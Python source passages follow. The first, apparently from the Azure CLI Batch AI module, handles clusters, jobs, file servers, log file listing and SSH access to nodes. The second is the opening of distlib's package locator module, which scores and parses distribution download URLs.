characters = list(string.ascii_lowercase * 12)
shuffle(characters)
return AUTO_STORAGE_ACCOUNT_PREFIX + ''.join(characters[:12])
def _create_auto_storage_account(storage_client, resource_group, location):
"""Creates new auto storage account in the given resource group and location
:param StorageManagementClient storage_client: storage client.
:param str resource_group: name of the resource group.
:param str location: location.
:return str: name of the created storage account.
"""
from azure.mgmt.storage.models import Kind, Sku, SkuName
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name)
while not check.name_available:
name = _generate_auto_storage_account_name()
check = storage_client.storage_accounts.check_name_availability(name)
storage_client.storage_accounts.create(resource_group, name, {
'sku': Sku(name=SkuName.standard_lrs),
'kind': Kind.storage,
'location': location}).result()
return name
def _add_setup_task(cmd_line, output, cluster):
"""Adds a setup task with given command line and output destination to the cluster.
:param str cmd_line: node setup command line.
:param str output: output destination.
:param models.ClusterCreateParameters cluster: cluster creation parameters.
"""
if cmd_line is None:
return cluster
if output is None:
raise CLIError('--setup-task requires providing of --setup-task-output')
cluster = copy.deepcopy(cluster)
cluster.node_setup = cluster.node_setup or models.NodeSetup()
cluster.node_setup.setup_task = models.SetupTask(
command_line=cmd_line,
std_out_err_path_prefix=output,
run_elevated=False)
return cluster
def _generate_ssh_keys():
"""Generates ssh keys pair"""
private_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa')
public_key_path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
keys.generate_ssh_keys(private_key_path, public_key_path)
logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
if resource_group:
return client.list_by_resource_group(resource_group)
return client.list()
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
return client.create(resource_group, workspace_name, location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
return client.create(resource_group, workspace_name, experiment_name).result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
"""Returns effective resource group, workspace and name for the given resource"""
if not name_or_id:
return None, None, None
if is_valid_resource_id(name_or_id):
parts = parse_resource_id(name_or_id)
return parts['resource_group'], parts['name'], parts['resource_name']
return resource_group, workspace, name_or_id
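# Example (editor's sketch, assuming msrestazure's parse_resource_id conventions where 'name'
# is the parent resource name and 'resource_name' is the innermost child name): for
# '/subscriptions/000/resourceGroups/rg/providers/Microsoft.BatchAI/workspaces/ws/fileServers/fs'
# the function returns ('rg', 'ws', 'fs'); for a bare name such as 'fs' it falls back to the
# supplied resource group and workspace.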
def create_cluster(cmd, client, # pylint: disable=too-many-locals
resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
account_key=None, setup_task=None, setup_task_output=None):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
_ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('ClusterCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
if params.node_setup:
params.node_setup.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
if nfs_name or azure_file_share or container_name:
params.node_setup = params.node_setup or models.NodeSetup()
mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
if nfs_name:
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
if use_auto_storage:
auto_storage_account, auto_storage_key = _configure_auto_storage(
cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
mount_volumes = _add_azure_file_share_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
auto_storage_account, auto_storage_key)
mount_volumes = _add_azure_container_to_mount_volumes(
cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
auto_storage_account, auto_storage_key)
if mount_volumes:
if params.node_setup is None:
params.node_setup = models.NodeSetup()
params.node_setup.mount_volumes = mount_volumes
if subnet:
params.subnet = models.ResourceId(id=subnet)
if setup_task:
params = _add_setup_task(setup_task, setup_task_output, params)
return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
return list(client.list_by_workspace(resource_group, workspace_name))
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=target)))
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
return client.update(resource_group, workspace_name, cluster_name, scale_settings=models.ScaleSettings(
auto_scale=models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes)))
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
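# Examples (editor's sketch): _is_on_mount_point('afs/logs', 'afs') is True because 'afs/' is
# a common prefix of both normalized paths, while _is_on_mount_point('afslogs', 'afs') is
# False; backslashes are converted to '/' first so Windows-style paths are handled as well.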
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
return _list_node_setup_files_for_cluster(cmd.cli_ctx, cluster, path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
"""Lists node setup task's log files for the given cluster.
:param models.Cluster cluster: the cluster.
:param str path: relative path under cluster node setup task's output directory.
:param int expiry: time in seconds for how long generated SASes will remain valid.
"""
unsupported_location = 'List files is supported only for clusters with a startup task configured to store its ' \
'output on an Azure File Share or Azure Blob Container'
if cluster.node_setup is None or cluster.node_setup.setup_task is None:
# Nothing to check or return if there is no setup task.
return []
prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
# The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
raise CLIError(unsupported_location)
suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
if not suffix:
# Clusters created with older API version do not report the path suffix, so we cannot find their files.
raise CLIError('List files is not supported for this cluster')
relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
if cluster.node_setup.mount_volumes is None:
# If nothing is mounted, the files were stored somewhere else and we cannot find them.
raise CLIError(unsupported_location)
# try mounted Azure file shares
for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
# try mounted blob containers
for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
# the folder on some other file system or on local disk
raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
"""Returns a list of files and directories under given path on mounted blob container.
:param models.AzureBlobFileSystemReference bfs: blob file system reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
from azure.storage.blob import BlockBlobService
from azure.storage.blob.models import Blob, BlobPermissions
result = []
service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
effective_path = _get_path_for_storage(path)
folders = set()
for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
if isinstance(b, Blob):
name = os.path.basename(b.name)
sas = service.generate_blob_shared_access_signature(
bfs.container_name, b.name, BlobPermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
False, b.properties.content_length))
else:
name = b.name.split('/')[-2]
folders.add(name)
result.append(LogFile(name, None, True, None))
result = [f for f in result if f.is_directory or f.name not in folders]
return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
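# Example (editor's sketch): callers build the path with os.path.join, so on Windows
# os.path.join('stdouterr', '.') yields 'stdouterr\\.', which this helper normalizes to
# 'stdouterr' before the value is passed to the storage SDK.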
def _get_files_from_afs(cli_ctx, afs, path, expiry):
"""Returns a list of files and directories under given path on mounted Azure File share.
:param models.AzureFileShareReference afs: Azure file share reference.
:param str path: path to list files from.
:param int expiry: SAS expiration time in minutes.
"""
FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'file#FileService', 'file.models#File', 'file.models#FilePermissions')
result = []
service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
share_name = afs.azure_file_url.split('/')[-1]
effective_path = _get_path_for_storage(path)
if not service.exists(share_name, effective_path):
return result
for f in service.list_directories_and_files(share_name, effective_path):
if isinstance(f, File):
sas = service.generate_file_shared_access_signature(
share_name, effective_path, f.name, permission=FilePermissions(read=True),
expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
result.append(
LogFile(
f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
False, f.properties.content_length))
else:
result.append(LogFile(f.name, None, True, None))
return result
def create_job(cmd, # pylint: disable=too-many-locals
client, resource_group, workspace_name, experiment_name, job_name, json_file,
cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
_ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('JobCreateParameters', json_obj) # type: models.JobCreateParameters
# If cluster is not configured via command line, let's get it from the config file.
if not cluster:
cluster = params.cluster.id
if not cluster:
raise CLIError('Please provide cluster information via command line or configuration file.')
cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
cluster, resource_group, workspace_name)
# Check presence of the cluster.
existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
params.cluster = models.ResourceId(id=existing_cluster.id)
# Update credentials and other parameters for mount volumes configured via config file.
if params.mount_volumes:
params.mount_volumes = _patch_mount_volumes(
cmd.cli_ctx, params.mount_volumes, account_name, account_key)
# Create mount volumes if required
if nfs or azure_file_share or container_name:
params.mount_volumes = params.mount_volumes or models.MountVolumes()
mount_volumes = params.mount_volumes
# Add NFS into mount volumes
if nfs:
nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
nfs, resource_group, workspace_name)
file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
# Add Azure File Share into mount volumes.
if azure_file_share:
mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
afs_mount_path, account_name, account_key)
# Add Blob Container into mount volumes.
if container_name:
mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
container_mount_path, account_name, account_key)
params.mount_volumes = mount_volumes
return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
expiry=DEFAULT_URL_EXPIRY_MIN):
options = models.JobsListOutputFilesOptions(
outputdirectoryid=output_directory_id,
directory=path,
linkexpiryinminutes=expiry)
return list(client.list_output_files(resource_group, workspace_name, experiment_name, job_name, options))
def sigint_handler(*_):
# Some libs do not handle KeyboardInterrupt nicely and print junk
# messages. So, let's just exit without any cleanup.
# noinspection PyProtectedMember
os._exit(0) # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
signal.signal(signal.SIGINT, sigint_handler)
url = None
# Wait until the file become available.
reported_absence_of_file = False
while url is None:
files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
for f in files:
if f.name == file_name:
url = f.download_url
logger.warning('File found with URL "%s". Start streaming', url)
break
if url is None:
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
if not reported_absence_of_file:
logger.warning('The file "%s" was not found. Waiting for the job to generate it.', file_name)
reported_absence_of_file = True
time.sleep(1)
if url is None:
logger.warning('The file "%s" was not found for the completed job.', file_name)
return
# Stream the file
downloaded = 0
while True:
r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
if int(r.status_code / 100) == 2:
downloaded += len(r.content)
print(r.content.decode(), end='')
job = client.get(resource_group, workspace_name, experiment_name, job_name)
if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
break
time.sleep(1)
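# Note (editor's sketch): the download URL is a SAS link to Azure Blob/File storage, which
# honors HTTP range requests, so 'Range: bytes=<downloaded>-' fetches only the bytes appended
# since the previous iteration; both 200 and 206 responses pass the 2xx check above.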
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
logger.warning('Job submitted at %s', str(job.creation_time))
last_state = None
reported_job_start_time = False
while True:
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info and not reported_job_start_time:
logger.warning('Job started execution at %s', str(info.start_time))
reported_job_start_time = True
if job.execution_state != last_state:
logger.warning('Job state: %s', job.execution_state)
last_state = job.execution_state
if job.execution_state == models.ExecutionState.succeeded:
logger.warning('Job completed at %s; execution took %s', str(info.end_time),
str(info.end_time - info.start_time))
return
if job.execution_state == models.ExecutionState.failed:
_log_failed_job(resource_group, job)
sys.exit(-1)
time.sleep(check_interval_sec)
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
"""Logs information about failed job
:param str resource_group: resource group name
:param models.Job job: failed job.
"""
logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
info = job.execution_info # type: models.JobPropertiesExecutionInfo
if info:
logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
str(info.end_time), str(info.end_time - info.start_time))
errors = info.errors
if errors:
for e in errors:
details = '<none>'
if e.details:
details = '\n' + '\n'.join(['{0}: {1}'.format(d.name, d.value) for d in e.details])
logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
sys.exit(info.exit_code)
logger.warning('Failed job has no execution info')
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
if generate_ssh_keys:
_generate_ssh_keys()
if ssh_key is None:
ssh_key = _get_default_ssh_public_key_location()
_ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
if json_file:
with open(json_file) as f:
json_obj = json.load(f)
params = _get_deserializer()('FileServerCreateParameters', json_obj)
else:
# noinspection PyTypeChecker
params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
params = _update_user_account_settings(params, user_name, ssh_key, password)
params.location = _get_workspace_location(client, resource_group, workspace)
if not params.data_disks:
# noinspection PyTypeChecker
params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
if disk_size:
params.data_disks.disk_size_in_gb = disk_size
if not params.data_disks.disk_size_in_gb:
raise CLIError('Please provide disk size in Gb.')
if disk_count:
params.data_disks.disk_count = disk_count
if not params.data_disks.disk_count:
raise CLIError('Please provide number of data disks (at least one disk is required).')
if caching_type:
params.data_disks.caching_type = caching_type
if storage_sku:
params.data_disks.storage_account_type = storage_sku
if not params.data_disks.storage_account_type:
raise CLIError('Please provide storage account type (storage sku).')
if vm_size:
params.vm_size = vm_size
if not params.vm_size:
raise CLIError('Please provide VM size.')
if subnet:
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
params.subnet = models.ResourceId(id=subnet)
return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
return client.list_by_workspace(resource_group, workspace_name)
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
"""Creates a tunnel to the remote host and runs provided func under the tunnel.
:param str remote_host: ip or address of the remote host
:param int port: the ssh port number
:param str username: username to login under
:param str or None password: the user password
:param str or None ssh_private_key: the path to private ssh key
:param local_addresses: local addresses to be forwarded
:param remote_addresses: target addresses
:param func: a function to run on the remote host. The forwarding is stopped as soon as func completes execution.
"""
from sshtunnel import SSHTunnelForwarder
local_addresses = [(a[0], a[1] if a[1] != 0 else _get_available_local_port()) for a in local_addresses]
with SSHTunnelForwarder((remote_host, port),
ssh_username=username,
ssh_password=password,
ssh_pkey=ssh_private_key,
remote_bind_addresses=remote_addresses,
local_bind_addresses=local_addresses):
func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
"""Executes the given cmdline on the provided host under given credentials.
:param str ip: ip address
:param int port: the ssh port number
:param str cmdline: command line to execute
:param str username: username to login
:param str or None password: the user password
:param str or None ssh_private_key: the path to the private ssh key
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
transport = ssh.get_transport()
transport.set_keepalive(15)
_, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
output_lock = threading.Lock()
def _worker(s):
for item in s:
with output_lock:
print(item, end='')
threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
for t in threads:
t.start()
# On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
while True:
for t in threads:
t.join(timeout=1)
if not t.is_alive():
return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
password=None, ssh_private_key=None):
from sshtunnel import BaseSSHTunnelForwarderError
if not any((cmdline, ports)):
return
ip, port = None, None
if node_id:
for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
if n.node_id == node_id:
ip = n.ip_address
port = int(n.port)
if ip is None:
raise CLIError('Cannot find a node with id={0}'.format(node_id))
else:
nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
ip = nodes[0].ip_address
port = int(nodes[0].port)
cluster = client.get(resource_group, workspace_name, cluster_name) # type: models.Cluster
username = cluster.user_account_settings.admin_user_name
try:
signal.signal(signal.SIGINT, sigint_handler)
if ports:
local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
if cmdline:
func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
else:
def _sleep():
while True:
time.sleep(1)
func = _sleep
_create_tunnel(ip, port, username, password, ssh_private_key,
local_addresses, remote_addresses, func)
else:
_ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
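# Example (editor's sketch): each entry of ports has the form 'local:remote_host:remote_port',
# e.g. '9000:localhost:8888' forwards 0.0.0.0:9000 on this machine to port 8888 on the node;
# a local port of 0 is replaced with a free ephemeral port inside _create_tunnel.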
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
cmdline=None, password=None, ssh_private_key=None):
if not any((cmdline, ports)):
return
# find the node if was not provided
if not node_id:
nodes = list(client.jobs.list_remote_login_information(
resource_group, workspace_name, experiment_name, job_name))
if not nodes:
raise CLIError('No nodes available in the cluster')
node_id = nodes[0].node_id
# find the cluster
job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name) # type: models.Job
cluster_id = parse_resource_id(job.cluster.id)
exec_on_node(client.clusters, cluster_id['resource_group'], cluster_id['name'],
cluster_id['resource_name'], node_id, ports, cmdline, password, ssh_private_key)
locators.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata, MetadataInvalidError
from .util import (cached_property, ensure_slash, split_filename, get_project_data,
parse_requirement, parse_name_and_version, ServerProxy,
normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
try:
return client.list_packages()
finally:
client('close')()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None: # pragma: no cover
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
except self.errors.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None: # pragma: no cover
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
is_downloadable = basename.endswith(self.downloadable_extensions)
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
return (t.scheme == 'https', 'pypi.org' in t.netloc,
is_downloadable, is_wheel, compatible, basename)
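# Example (editor's sketch): tuples compare element-wise, so
# score_url('https://pypi.org/packages/.../foo-1.0.tar.gz') starts with
# (True, True, True, False, True, ...) and outranks an http:// mirror URL for the same
# archive, whose score starts with (False, False, ...).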
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
def split_filename(self, filename, project_name):
"""
Attempt to split a filename into project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='): # pragma: no cover
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/': # pragma: no cover
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if not is_compatible(wheel, self.wheel_tags):
logger.debug('Wheel not compatible: %s', path)
else:
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif not path.endswith(self.downloadable_extensions): # pragma: no cover
logger.debug('Not downloadable: %s', path)
else: # downloadable extension
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t: # pragma: no cover
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver: # pragma: no cover
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
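# Example (editor's sketch): for
# 'https://pypi.org/packages/source/f/foo/foo-1.0.tar.gz#sha256=deadbeef' with
# project_name 'foo', the result is roughly {'name': 'foo', 'version': '1.0',
# 'filename': 'foo-1.0.tar.gz', 'url': <the URL without its fragment>,
# 'sha256_digest': 'deadbeef'}.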
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at a "digests" dictionary
or keys of the form 'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
if 'digests' in info:
digests = info['digests']
for algo in ('sha256', 'md5'):
if algo in digests:
result = (algo, digests[algo])
break
if not result:
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
